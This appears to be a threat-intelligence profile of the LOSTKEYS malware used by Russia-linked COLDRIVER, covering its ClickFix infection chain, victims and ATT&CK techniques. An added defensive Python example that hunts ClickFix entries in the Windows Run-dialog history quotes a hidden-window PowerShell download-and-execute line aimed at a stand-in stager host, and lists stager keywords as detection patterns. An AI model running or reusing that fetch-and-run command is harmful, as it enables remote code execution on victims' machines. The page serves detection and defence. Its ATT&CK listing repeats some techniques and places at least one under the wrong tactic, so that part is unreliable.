
LOSTKEYS

LOSTKEYS is a malware family attributed by Google Threat Intelligence Group to the Russia-linked cyberespionage actor COLDRIVER, also known as Star Blizzard, Callisto, UNC4057, Seaborgium, and TA446, and described in the reporting as linked to Russia’s FSB. It was observed in targeted espionage operations in January, March, and April 2025, with possible earlier related samples from December 2023 that Google could not conclusively tie to the same operation. COLDRIVER historically focused on credential phishing, but reporting states LOSTKEYS marked a shift toward deeper host compromise and post-compromise intelligence collection.

The malware is used to steal files and collect host information from compromised Windows systems. Reported capabilities include exfiltrating documents from a hard-coded list of file extensions and directories, gathering system information, and enumerating running processes. Multiple sources describe the final payload as a Visual Basic Script. The infection chain is multi-stage and commonly begins with fake CAPTCHA or ClickFix-style lures that trick victims into pasting and executing malicious PowerShell via the Windows Run dialog. The staged PowerShell retrieves successive payloads from attacker-controlled infrastructure, with unique identifiers per victim. Reported anti-analysis behavior includes a sandbox-evasion check based on the MD5 hash of the device’s display resolution. The final payload decoding reportedly uses a two-key substitution cipher, with unique key pairs per infection chain.
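As an added example (not code from the Mallory page or from Google's reporting), the following Python parses a constructed `reg export` of the current user's RunMRU key, the registry history of commands typed into the Windows Run dialog, and flags entries that launch PowerShell together with download-and-execute or hidden-window indicators, which is the artifact a responder would check when hunting for the ClickFix-style paste-to-Run execution described above. The sample export, the URL and the victim identifier are constructed placeholders.

```python
import re

# Constructed sample of what `reg export` of the current user's RunMRU key
# produces. RunMRU records commands typed into the Run dialog (Win+R), the
# execution path a ClickFix-style lure abuses. Strings use .reg escaping
# (\" for quotes, \\ for backslashes); each entry carries a trailing "\1".
SAMPLE_REG_EXPORT = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU]
"a"="notepad\\1"
"b"="powershell -w hidden -c \"iwr http://stager.example/s?id=VICTIMID | iex\"\\1"
"c"="calc\\1"
"MRUList"="bca"
'''

VALUE_RE = re.compile(r'^"(?P<name>[^"]+)"="(?P<data>.*)"$')
# Defender-side heuristics: a Run-dialog line that starts PowerShell and
# either fetches remote content, evaluates it, or hides its window.
LAUNCHER_RE = re.compile(r'\b(powershell|pwsh)\b', re.I)
STAGER_RE = re.compile(
    r'(\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|iex|'
    r'invoke-expression)\b|-e(nc|ncodedcommand)?\b|-w(indowstyle)?\s+hidden)', re.I)


def parse_runmru(reg_text: str) -> list[str]:
    """Return the Run-dialog history, most recent first, unescaped and without the '\\1' suffix."""
    values = {}
    for line in reg_text.splitlines():
        m = VALUE_RE.match(line.strip())
        if m:
            data = m.group('data').replace('\\"', '"').replace('\\\\', '\\')
            values[m.group('name')] = data
    order = values.pop('MRUList', '')  # MRUList lists slot letters, newest first
    history = []
    for slot in order:
        if slot in values:
            cmd = values[slot]
            history.append(cmd[:-2] if cmd.endswith('\\1') else cmd)
    return history


def flag_clickfix_candidates(history: list[str]) -> list[str]:
    """Keep Run-dialog commands that launch PowerShell and show a stager or hiding indicator."""
    return [c for c in history if LAUNCHER_RE.search(c) and STAGER_RE.search(c)]


if __name__ == '__main__':
    for cmd in flag_clickfix_candidates(parse_runmru(SAMPLE_REG_EXPORT)):
        print('suspicious Run entry:', cmd)
```

On a live host the same parser applies to the output of `reg export HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU <file>`, and a hit should be correlated with process-creation telemetry for the matching PowerShell launch.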

Victimology consistently centers on high-value espionage targets: current and former advisors to Western governments, military personnel, diplomats, journalists, think tanks, NGOs, non-profits, civil society organizations, and individuals connected to Ukraine. Reporting also describes targeting across NATO countries, the Baltics, Nordics, Eastern Europe, and Western countries more broadly. The assessed objective is intelligence collection in support of Russian interests.

Google reported technical details, indicators of compromise, and YARA rules for detection, and stated that identified malicious domains and files were added to Safe Browsing. Reporting further states that after public disclosure of LOSTKEYS in May 2025, COLDRIVER rapidly pivoted to new malware families including NOROBOT, YESROBOT, and MAYBEROBOT, and Google said it did not observe further LOSTKEYS use after that transition.

THREAT ACTORS

Groups observed using it: 1 distinct threat actor attributed by public researchers.

Star Blizzard

Russian cyber espionage hackers are using a new malware strain dubbed "Lostkeys" in a targeted espionage campaign aimed at Western officials, NGOs and journalists.

via Bank Info Security (bankinfosecurity.com)
MITRE ATT&CK

Techniques & procedures

13 distinct techniques documented for this family, organized by ATT&CK tactic.

Initial Access

1 technique
T1566 Phishing (Evidence: 2)

"Typically, the threat group deploys malware in phishing attacks..."

Execution

3 techniques
T1059.001 PowerShell (Evidence: 1)

The Lostkeys attack chain begins with a fake Captcha page that tricks victims into pasting malicious PowerShell code into their Windows Run prompt... Once executed, the PowerShell script pulls in successive payloads, each retrieved from the same command-and-control server but requiring unique identifiers per victim.

T1059.005 Visual Basic (Evidence: 1)

The final payload is a Visual Basic Script file, which exfiltrates files with specific extensions from targeted directories, gathers system information and running processes and sends them back to the attacker.

T1204 User Execution (Evidence: 2)

The Lostkeys attack chain begins with a fake Captcha page that tricks victims into pasting malicious PowerShell code into their Windows Run prompt, a technique dubbed "ClickFix".

Persistence

1 technique
T1112 Modify Registry (Evidence: 1)

"...splits encryption keys across multiple files and registers entries to hinder tracking and analysis."

Stealth

3 techniques
T1027 Obfuscated Files or Information (Evidence: 1)

"It allows hackers to install malware in stages while concealing its core components across multiple downloads."

T1036 Masquerading (Evidence: 1)

"...trick victims into manually launching a disguised program file..." and "...embedding malicious code into fake PDF documents and convincing targets to download a 'decryption' utility..."

T1497 Virtualization/Sandbox Evasion (Evidence: 1)

The malware shows signs of sandbox evasion. Before advancing to the final stage, the second-stage code checks the device's display resolution hash and halts execution if it matches a known virtual machine setup.

T1112 Modify Registry (Evidence: 1)

"...splits encryption keys across multiple files and registers entries to hinder tracking and analysis."

Discovery

3 techniques
T1057 Process Discovery (Evidence: 1)

The final payload is a Visual Basic Script file, which exfiltrates files with specific extensions from targeted directories, gathers system information and running processes and sends them back to the attacker.

T1082 System Information Discovery (Evidence: 1)

The final payload is a Visual Basic Script file, which exfiltrates files with specific extensions from targeted directories, gathers system information and running processes and sends them back to the attacker.

T1497 Virtualization/Sandbox Evasion (Evidence: 1)

The malware shows signs of sandbox evasion. Before advancing to the final stage, the second-stage code checks the device's display resolution hash and halts execution if it matches a known virtual machine setup.

Collection

1 technique
T1005 Data from Local System (Evidence: 2)

The final payload is a Visual Basic Script file, which exfiltrates files with specific extensions from targeted directories...

T1071 Application Layer Protocol (Evidence: 1)

Once executed, the PowerShell script pulls in successive payloads, each retrieved from the same command-and-control server but requiring unique identifiers per victim.

Exfiltration

1 technique
T1041 Exfiltration Over C2 Channel (Evidence: 2)

The final payload is a Visual Basic Script file, which exfiltrates files with specific extensions from targeted directories, gathers system information and running processes and sends them back to the attacker.
